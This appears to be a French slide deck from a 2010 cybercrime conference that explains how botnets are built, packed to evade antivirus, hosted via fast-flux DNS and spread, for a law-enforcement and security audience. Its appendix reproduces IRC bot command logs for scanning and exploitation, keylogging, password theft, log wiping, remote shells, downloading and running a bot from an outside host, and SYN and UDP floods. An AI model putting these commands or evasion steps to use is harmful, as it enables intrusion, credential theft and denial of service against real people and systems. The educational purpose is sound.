1

Les BotnetsColloque sur la cybercriminalité

Avril 2010

2

Alain Rioux, CISSP

• Sergent spécialiste, MVDI, BCEDI, Sûreté du Québec, depuis 2005

• Certifications CISSP, GREM

• Certificat en informatique, ULaval

• « Operation Basique »

• Microsoft LETech 2006‐2008

• Gold ILECA 2008, Bangkok, Thaïlande

• Polytechnique, SANS (mentorat)

• Développeur

3

Michel Cusin, CISSP

• Consultant en sécurité, Bell Canada

• Mentor/instructeur SANS Institute

• Certifications CISSP, CEH, GCIH, OPST, etc…

• Site cusin.ca

4

Les Botnets

Serveur de commande

BotBotBotBotBot

Suspect

5

Les Botnets

• Le programme de bot

• Création d’un bot

• Infrastructure du botnet

• La propagation

• Autres types de bot

• Commandes diverses

• Utilisation du botnet

6

Le programme

• Code source compilé en exécutable (.exe)

• Les grandes familles : – Agobot/Phatbot/ForBot/XtremBot

– SdBot/Rbot/UrBot/RxBot/UrxBot/JrBot

• Intègre le ver et le robot IRC

• Peut se retrouver sous différentes variantes (Ex. NZM, RoseBot, Ruffbot, etc.)

7

Création

• Les étapes :– Code source récupéré sur Internet ou autre moyen

– Configuration

– Compilation

– Compression/Chiffrement

– Test

8

Création

• Code source

• Configuration– Fichier de configuration

• Ex. StBot (Stable Bot) 1.0

– Générateur de configuration

• Ex. Agobot• Compilation

– Ex. MS Visual Studio, GCC, etc.

9

Création

• Générateur d’exécutable

www.megasecurity.org

10

Création

• Packing : Compression/Chiffrement– Réduire la taille de l’exécutable

– Éviter la détection par les anti‐virus

– Protéger le code contre la rétro‐ingénierie

• Outil : le packer

• Ex. UPX, Armadillo, PECompact, RLPack, Neolite, Morphine, Themida, PELock, etc.

11

Création

12

Test

• Antivirus en ligne (multi‐moteurs)– www.virustotal.com

– virusscan.jotti.org

– www.novirusthanks.org

– virus‐trap.org

– www.virscan.org

– www.viruschief.com

– www.filterbit.com

13

14

Infrastructure

• Serveur de commande et contrôle– Type : IRC, HTTP, P2P, etc.

– Hébergement

– Adresse IP ou nom de domaine

• Hébergement des ressources (programme de bots pour les mises à jour)

• Si nom de domaine, enregistrement et DNS

15

Infrastructure

• Type de serveur– IRC

• Simple, rapide, documentée et disponibilité

• Moins convivial (ligne de commande), Pare‐feu

• Ex. UnRealIRCd, BewareIRCd, Ultimate, InspIRCd, etc.

– HTTP• Port 80 (Pare‐feu), Convivial (GUI en HTML)

– P2P• Décentralisé

16

Infrastructure

17

Infrastructure

Source : securitylabs.websense.com

18

InfrastructureS

ourc

e : p

anda

secu

rity.

com

19

Infrastructure

• Hébergement– Un ordinateur du pirate ou un ami

– Un serveur IRC existant (Ex. Undernet)

– Un serveur dédié (payé frauduleusement ou non)

– Un bot performant (serveur ou non)

– Une grappe de bots performants (cluster)

• Hébergement des ressources– Fournisseurs gratuits (iquebec.com, voila.fr, freewebs.com, etc.)

20

Infrastructure

• DNS– DNS dynamique : un domaine, une adresse IP variable : ex.No‐IP.org, dyndns.com, yi.org, etc.

– DNS Round Robbin (un domaine, plusieurs adresses IP choisies en alternance)

– DNS Netmaskordering (Comme RR, mais avec priorité basée sur la comparaison des masques)

N.B. : Le nom de domaine pointe directement sur le serveur de

commande et contrôle. Ceci représente le point le plus

vulnérable du botnet. Solution : Le Fast‐Flux.

21

Fast‐flux

Single‐Flux

Source : www.xmcopartners.com

22

Fast‐flux 

Double‐flux

Source : www.xmcopartners.com

23

Infrastructure

• Encore plus loin : Web 2.0 Botnet– Twitter

– Facebook

– Google/Ajax

– Etc.

24

Propagation

• Deux activités : Balayage (scan) et Infection

• Dans  un  bot  traditionnel,  c’est  le  ver  qui accomplit ces tâches,  il peut être autonome ou semi‐autonome

• Il recherche une ou plusieurs vulnérabilités (Ex. DCOM, SMB, ASN, VNC, etc.) 

• Démonstration : Autonome

25

Autonome

26

Autonome

27

Semi‐autonome

Serveur de commande

Scan 24.72.x.x ->Faille x

Bot

Bot

Bot

Bot

Suspect

24.72.130.224

24.72.130.225Faille x présente

24.72.130.226

28

Semi‐autonome

Serveur de commande

Bot

Bot

Bot

Suspect

Bot : 24.72.130.225

Bot

29

Semi‐autonome

Commande de balayage :

Pirate!kktr@Longueuil‐A31682EC.mc.videotron.ca TOPIC #botnet : .advscan asn1smb 75 5 0 201.4.x.x

Balayage commandé et infection automatique : 

CAN|XP|SP1|00|2633|W|548!eabt@142‐217‐78‐77.telebecinternet.net PRIVMSG #botnet :FTP File transfercomplete: 201.4.134.6     Infection par un autre bot

BRA|XP|SP1|00|1500|W|957!vtpxe@201.4.134.6 JOIN : #botnet Nouveau bot

BRA|XP|SP1|00|1500|W|957!vtpxe@201.4.134.6 PRIVMSG #botnet : [SCAN]: Random Port Scan started on 201.4.x.x:445 with a delay of 5 seconds for 0 minutes using 75 threads. 

CAN|XP|SP1|00|2633|W|548!eabt@142‐217‐78‐77.telebecinternet.net PRIVMSG #botnet :FTP File transfercomplete: 201.4.136.102

BRA|XP|SP0|00|3066|W|771!vbf@201.4.136.102 JOIN : #botnet

BRA|XP|SP0|00|3066|W|771!vbf@201.4.136.102 PRIVMSG #botnet : [SCAN]: Random Port Scan started on 201.4.x.x:445 with a delay of 5 seconds for 0 minutes using 75 threads.

30

Vulnérabilités

Statistiques d’infection :

<@Pirate> .stats

<CAN|XP|SP1|00|2633|W|548> [SCAN]: Exploit Statistics: Dcom135: 0, Dcom445: 0, Dcom1025: 0, asn1http: 0, 

asn1smb: 4625, asn1smbnt: 0, vnc: 0, netapi: 0, sym: 0, Total: 4625

Balayage VNC (faille authbypass) :

<@Pirate> .asc vnc 100 5 200 170.x.x.x ‐s

<[F]CZE|765771811> ‐ Vnc ‐ trying to root 170.123.234.19 ‐ nopass ;)  ‐

<BRA|137791145> ‐ Vnc ‐ 170.123.213.191 ‐ password ‐:12345

<ESP|37523> ‐ Vnc ‐ 170.126.235.164 ‐ password ‐:12345

<[F]POL|962379907> ‐ Vnc ‐ 170.126.165.91 ‐ password ‐:123456

31

Autres types

• Autres types de bots– IRC Bot

– « Web » Bot

– Autres outils

32

Le IRC Bot

• Robot IRC convertit en méchant Robot– Exemple de Robot IRC : Eggdrop, Windrop, EnergyMech (Emech), Cygmech, WinMech, Darkbot, etc.

• Modifications : Furtivité, Porte dérobée, etc.

• Pas de ver intégré

• Installation « à la main »

• Démonstration : Eggdrop

33

Le Web Bot

• Créé avec les nouveaux langages du Web : Java, PHP, ASP, Perl, etc.

• Ciblent précisément les serveurs Web– Exemples : 

• W32.Storm.Worm (2001)

• PHP Bot

34

PHP Bot

• Bot écrit en PHP

• Exploite le RFI

35

Autres outils

• BNC ou bouncer : plus qu’un proxy IRC, permet de maintenir une connexion permanente. Ex. PsyBNC

• Vhost : Avec BNC ou HostServ

36

Conclusion

• Conséquences et utilisations des botnets

– Perturbation  des  communications :  volontaire (flood)  ou  involontaire  (consommation  de ressources comme les pourriels)

– Perturbation  des  systèmes :  Infection  virale,  coût en ressources humaines et matériels (ex. antivirus)

– Fraude au clic : régies publicitaires, concours, etc.

– Warez : vol de licences, hébergement sur les bots

– Web Defacement et méfaits : attaques DDoS

37

Conclusion

– Vol d’identité de masse : pstore, sniffer, keylogger, accès aux fichiers

– Hameçonnage : hébergement du faux site, serveur SMTP pour  les pourriels, obtention d’accès sur des sites bancaires

– Extorsion : menace d’utilisation du botnet

– Espionnage et vol de données

– Cyberterrorisme

– Cyberguerre

38Source : www.nytimes.com

39

Conclusion

• À venir

– La prévention

– La détection

– L’éradication (décontamination)

– L’investigation

– La mise en accusation et la condamnation

40

Questions ?

Encore plus...

Liste de commandes

Avec exemples

41

Commandes

• Informations  sur  l’hôte :  ordinateur,  système d’exploitation, paramètres  réseau,  liste de processus, base de registre, etc.

• Informations  sur  le bot : uptime,  installation, version, liste des contrôleurs, threads, etc.

• Déplacements  :  clônage,  joindre  ou  quitter  une chambre, se reconnecter, etc.

• Démarrer un  service :  serveur HTTP,  FTP,  IRC,  SMTP, proxy, etc.

42

Commandes

• Espionnage  et  vol  de  données :  liste  des  fenêtres actives,  capture d’écran, utiliser  la webcam, parcours du  système  de  fichiers,  vol  des  licences,  keylogger, sniffer, pstore, etc.

• Entretien  du  système :  session  distante,  effacer  les logs,  enlever  les  autres  bots,  télécharger  une mise  àjour, etc.

• Attaques et fraudes : attaques DDoS, fraudes au clic

43

Commandes

Informations système :<@Pirate> [00|TWN|XP|SP0]‐277701 .si

<[00|TWN|XP|SP0]‐277701> ‐ sysinfo ‐ CPU : 1600MHz.  RAM : 1,048,048KB total, 1,048,048KB free.  

Disk : 20,482,840KB total, 2,578,028KB free.  OS : Windows XP (5.1, Build 2600). Sysdir : D:\WINDOWS\System32

Hostname : guiltpun‐x5q2g9 (170.125.200.173). Current User : guiltpunish.  Date : 20:Feb:2008. Time : 10:05:26.

Uptime : 0d 1h 12m.

<@Pirate> ‐uname

<zlw281> Linux somebot1.com 2.6.19.2 #2 SMP Sun Jan 14 04:15:38 CET 2007 i686 Linux

<reg279> FreeBSD somebot2.com 6.2‐STABLE FreeBSD 6.2‐STABLE #0: Tue Jan 23 12:44:26 IRKT 2007

root@v23.ispsystem.net:/usr/obj/usr/src/sys/ISPSYSTEM i386 FreeBSD

Informations réseau :<@Pirate> .ni

<[00|USA|1821> [ NETINFO ] [Connection Type]: LAN (LAN Connection). [Internal IP]: 129.93.231.166. [External

IP]: 125.103.251.136. [Hostname]: somebot..edu. [Private]: No.[Country]: United States.[Speedtest]: Upload:

92.56 KB/s, Download: 144.35 KB/s.[Bandwidth]: Downloaded: 767MB, Uploaded: 798MB.

44

Commandes

Liste de processus :<@Pirate> .ps list

<[P24|USA|44184]> [PROC] Process List:

<[P24|USA|44184]>  144   ‐ 60 K      ‐ "\SystemRoot\System32\smss.exe"

<[P24|USA|44184]>  168   ‐ 1,660 K   ‐ "\??\C:\WINNT\system32\csrss.exe"

<[P24|USA|44184]>  188   ‐ 2,860 K   ‐ "\??\C:\WINNT\system32\winlogon.exe"

<[P24|USA|44184]>  216   ‐ 3,076 K   ‐ "C:\WINNT\system32\services.exe"

<[P24|USA|44184]>  228   ‐ 1,440 K   ‐ "C:\WINNT\system32\lsass.exe"

<[P24|USA|44184]>  404   ‐ 2,008 K   ‐ "C:\WINNT\system32\svchost.exe"

...

<[P24|USA|44184]>  8256  ‐ 2,112 K   ‐ "C:\Program Files\Internet Explorer\iexplore.exe"

<[P24|USA|44184]>  8976  ‐ 13,020 K  ‐ "C:\Program Files\MSN Messenger\msnmsgr.exe"

<[P24|USA|44184]>  4088  ‐ 3,696 K   ‐ "C:\winnt\system32\minimech.exe"

<[P24|USA|44184]> [PROC] End of list.

45

Commandes

Base de registre :<@Pirate> .reg query HKLM Software\Microsoft\Windows\CurrentVersion\Run

<[D01|ISR|86665]> (03) Software\Microsoft\Windows\CurrentVersion\Run\Intec Drivers32 (REG_SZ)

<[D01|ISR|86665]> (04) Software\Microsoft\Windows\CurrentVersion\Run\Intec Service Drivers (REG_SZ)

<[D01|ISR|86665]> (05) Software\Microsoft\Windows\CurrentVersion\Run\NeroCheck (REG_SZ)

...

<[D01|ISR|86665]> [ REG ] Done with query: HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Threads du bot :<@Pirate> .t

<ie4[hax]‐311> [ Worms SDThreads ]

<ie4[hax]‐311> 0: Main thread

<ie4[hax]‐311> 1: Firewall/AntiVirus/Exe Killer Mood By Pirate

<ie4[hax]‐311> 2: Keys logging to C:\WINNT\system32\system.dll

<ie4[hax]‐311> 3: NTScan

<ie4[hax]‐046> 4: [Keylogger] logging to #botnet‐keylog

<ie4[hax]‐046> 5: [HTTPD] Server listening on port: 8080 root dir: c:\

<ie4[hax]‐311> [ Worm SPYThreads ]

46

Commandes

Durée de vie (uptime) :<@Pirate> .up

<[P16|GBR|48359]> [ MAIN ] Uptime: 16 days 14:52, Record Uptime: 30 days 06:54.

Date de l’installation :<@Pirate> .it

<[P20|USA|82515]> [ MAIN ] Bot Installer Sur: 06/20/2006, 08:15 PM.

Information sur le bot :<@Pirate> !version

<ilgw845> pHp bOt v1

Liste de contrôleurs (login) :<@Pirate> .who

<[P12|USA|18490]> [ MAIN ] Login List:

<[P12|USA|18490]> <0> Pirate!user@username.users.undernet.org

<[P12|USA|18490]> [ MAIN ] Login List complete.

47

Commandes

Clônage :<@Pirate> .clone us.undernet.org 6667 #botnet ‐s

<BEL|87258> ‐ clones  ‐ Created on us.undernet.org:6667, in channel #botnet.

Joindre une chambre :<@Pirate> .join #botnet2

* Joins: ie[hax]‐3690 (~iehax‐51@dhcp‐0‐8‐a1‐10‐32‐76.cpe.beld.net)

Quitter une chambre :<@Pirate> .part #botnet2

* Parts: ie3[hax]‐690 (~ie3hax‐6@modemcable035.85‐37‐24.mc.videotron.ca)

Se reconnecter :<@Pirate> .reconnect

* Quits: USA|46263 (~xwyqy@adsl‐68‐92‐219‐167.dsl.hstntx.swbell.net) (Quit: reconnecting)

* Quits: USA|07769 (iogcvdu@cpe‐74‐76‐81‐213.nycap.res.rr.com) (Quit: reconnecting)

48

Commandes

Démarrer un serveur :<@Pirate> .httpd 8080 c:\

<ie[hax]‐0724> [ HTTPD ] Server commencer sur http://somebot1.com:8080

<[04]ax]‐9323> [ HTTPD ] Server commencer sur http://somebot2.com:8080

Démarrer un proxy :<@Pirate> .redirect 9696 Oslo1.NO.EU.undernet.org 6666

<h4ck3d‐005> TCP Redirect created on port 9696 to Oslo1.NO.EU.undernet.org:6666.

<h4ck3d‐033> TCP Redirect created on port 9696 to Oslo1.NO.EU.undernet.org:6666.

Liste des fenêtres actives :<@Pirate> .aw

<ie2[hax]‐317> Fenetre active: Multicam Surveillance System 7.0.

<ie3[hax]‐778> Fenetre active: VoyagesDestination ‐ www.voyagesdestination.com ‐Mozilla Firefox.

<[30]hax]‐216> Fenetre active: Windows Live Hotmail ‐Microsoft Internet Explorer.

<ie4[hax]‐109> Fenetre active: NOD32 Scanner ‐ [Mi perfil].

<ie3[hax]‐743> Fenetre active: iTunes.

49

Commandes

Lister les disques :<@Pirate> .di

<[00|USA|4272> [DRIVES] Listing drives:

<[00|USA|4272> Disk Drive (C:\), total: 244,196,000KB, free: 233,507,040KB, available: 233,507,040KB.

<[00|USA|4272> Disk Drive (D:\), total: 244,196,000KB, free: 243,979,700KB, available: 243,979,700KB.

<[00|USA|4272> Cdrom Drive (E:\): Failed to stat, device not ready.

<[00|USA|4272> Drive Totals (N/A), total: 488,392,000KB, free: 477,486,740KB, available: 477,486,740KB.

<[00|USA|4272> [DRIVES] End of list.

Capture d’écran :<@Pirate> .sc c:\desktop.gif

<ie4[hax]‐046> Screen capture saved to c:\desktop.gif.

Utiliser la webcam :<@Pirate> .ckeckcam

<ie3[hax]‐976> [WebCAM On] Asti de cochon que jte voille pas mespionner le cul

50

Commandes

Vol de licences :<@Pirate> .cdkeys

<Wo|rM‐663> Microsoft Windows Product ID CD Key: (55194‐640‐0013789‐26509).

<Wo|rM‐663> [CDKEYS]: Recherche Completer.

Protected Storage Data (Internet Explorer) :<@Pirate> .pstore

<[D01|ISR|86665]> [ PSTORE ] IE Auto‐Complete: http://somesite1.com/, usager:motdepasse

<[D01|ISR|86665]> [ PSTORE ] IE Auto‐Complete: http://somesite2.com/somepage.php, usager:motdepasse

Reniflage de paquets (sniffing) :<@Pirate> .sniffer

<[00|ESP|855685]> [ SNIFFER ] Started packet sniffer.

<[00|ESP|855685]> IRC sniff "210.84.47.226:2402" to "66.54.229.120:1863": ‐ « ... »

<[00|ESP|855685]> HTTP sniff « 197.56.16.12:80" to "210.84.47.226:2501": ‐ « ... »

51

Commandes

Enregistreur de clavier (keylogging) :<@Pirate> .keylog #botnet‐keylog

<[05]ax]‐3480> [Keylogger] Started (logging to: #botnet‐keylog)

<[05]ax]‐3480> (MSN Hotmail ‐ Nouveau message ‐Microsoft Internet Explorer):  ... ( Return )

<[05]ax]‐3480> (Courrier :: Bienvenue à Agora ‐Microsoft Internet Explorer):  ..[TAB]...[TAB][TAB] ( Return )

<ie3[hax]‐808> (Solutions en ligne ‐ AccèsD ‐Microsoft Internet Explorer): .... (Changed window)

Effacer les logs :<@Pirate> „x47x49x96

<[02|CAN|2142> ‐=[  BOT  ]=‐ Cleared 3/3 event logs.

<@Pirate> „x42x40x8Fx57x13x86xB9x22

<[02|CAN|2142> ‐=[  BOT  ]=‐ DNS cache flushed.

<@Pirate> „x42x40x8Fx57x13x83xA5x21

<[02|CAN|2142> ‐=[  BOT  ]=‐ ARP cache flushed.

52

Commandes

Session en ligne de commande :<@Pirate> .opendos

<ie[hax]‐069> [[1]CMD[1]] Active

<ie[hax]‐069> Microsoft Windows 2000 [Version 5.00.2195]

<ie[hax]‐069> (C) Copyright 1985‐2000 Microsoft Corp.

<ie[hax]‐069> Z:\>

<@Pirate> .cmd dir

<ie[hax]‐069> dir

<ie[hax]‐069>  Volume in drive Z is System

<ie[hax]‐069>  Volume Serial Number is 1234‐35BB

<ie[hax]‐069>  Directory of Z:\

<ie[hax]‐069> 04/12/2006  09:39a      <DIR>          .

<ie[hax]‐069> 04/12/2006  09:39a      <DIR>          ..

... [Liste des fichiers] ...

<ie[hax]‐069>              194 File(s)     23,236,499 bytes

<ie[hax]‐069>               52 Dir(s)  20,903,641,088 bytes free

<ie[hax]‐069> Z:\>

53

Commandes

« Killer » les autres bots :<@Pirate> .pl

<ie4[hax]‐548>  [System Process] System SMSS.EXE CSRSS.EXE WINLOGON.EXE SERVICES.EXE LSASS.EXE

svchost.exe ccSetMgr.exe ccEvtMgr.exe SPBBCSvc.exe spoolsv.exe DWRCS.EXE svchost.exe NPFMntor.exe

regsvc.exe mstask.exe MSupdate.exe WinMgmt.exe svchost.exe explorer.exe DWRCST.EXE nero.exe iexplore.exe

WININET.EXE ccApp.exe svchostt.exe inkjet.exe sounds.exe iexplore.exe svchostt.exe sounds.exe symlcsvc.exe

wuauclt.exe

<@Pirate> .kp svchostt.exe

Télécharger un nouveau bot :<@Pirate> .download http://membres.lycos.fr/pirate/winsys.exe winsys.exe 1  

<[21][F]RoSe444271> downloading http://membres.lycos.fr/pirate/winsys.exe...  

<[21][F]RoSe444271> downloaded 72.9 kb to winsys.exe @ 72.9 kb/sec.  

<[21][F]RoSe444271> opened winsys.exe. 

54

Commandes

Fraude au clic ‐ Régies Publicitaires :<@Pirate> @open http://pirate.somesite.com/ Page contenant publicité

<[2]ujfgpzgmkjb> file opened.

<[2]sciuvmymwf> file opened.

Synflood :<@Pirate> !syn 24.212.36.215 113 50

<[21]USA|760760273> [SYN]: Flooding: (24.212.36.215:113) for 50 seconds.

<[5]USA|084308781> [SYN]: Flooding: (24.212.36.215:113) for 50 seconds.

<[21]USA|760760273> SYN// Done with flood (35KB/sec).

<[5]USA|084308781> SYN// Done with flood (129KB/sec).

<@Pirate> .ddosbox 208.114.100.12

<ie[hax]‐4108> DrDos Random Ack/Synflooding [208.114.100.12] for 50 seconds

<ie[hax]‐9284> DrDos Random Ack/Synflooding [208.114.100.12] for 50 seconds

<ie[hax]‐4108> Done with DrDos Random Ack/Syn flood [18KB/sec]

<ie[hax]‐9284> Done with DrDos Random Ack/Syn flood [480KB/sec]

55

Commandes

UDP :<@Pirate> !udp 202.106.133.140 0 99999999

<ux766> Udp send to 202.106.133.140 delays 99999999 seconds

<dodh546> Udp send to 202.106.133.140 delays 99999999 seconds

<mmj996> Udp send to 202.106.133.140 delays 99999999 seconds

<@Pirate> .wisdom.udp 159.171.175.141 2048 4096 50

<USA|949449114> ‐ wisdom(udp) ‐ Sending packets to 159.171.175.141...

<[33][F]BRA|015201859> ‐ wisdom(udp) ‐ Sending packets to 159.171.175.141...

Ping :<@Pirate> .ping 24.122.166.215 1000 4096 100

<DEU|24523> ‐ ping  ‐ Sending 1000 pings to 24.122.166.215. packet size: 4096, timeout: 100(ms).

<CAN|64836> ‐ ping  ‐ Sending 1000 pings to 24.122.166.215. packet size: 4096, timeout: 100(ms).

56

Commandes

IRC Message Flood :<@Pirate> ‐insult SomeUser Un autre usager IRC

<Oimec4945> (SomeUser) You are so stupid you couldn't pour piss out of a boot if the  instructions were written

on the bottom of the heel.

<__mech‐__> (SomeUser) There's nothing wrong with you that a miracle couldn't cure...

<PaNaDooLa> (SomeUser) For a minute there I didn't recognize you. It was the happiest minute of my life.

<IrcL3aDeR> (SomeUser) Do YOU ever get tired of having yourself around?

Une chambre, ex.. #montreal

<@Pirate> !privmsg #montreal POUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHA

HAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHA

HAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHAHAHAHAHAHAHAHAHAHAHAHAPOUHAHA

HAHAHAHAHAHAHAHAHAHAHA

57

Les BotnetsColloque sur la cybercriminalité

Mai 2010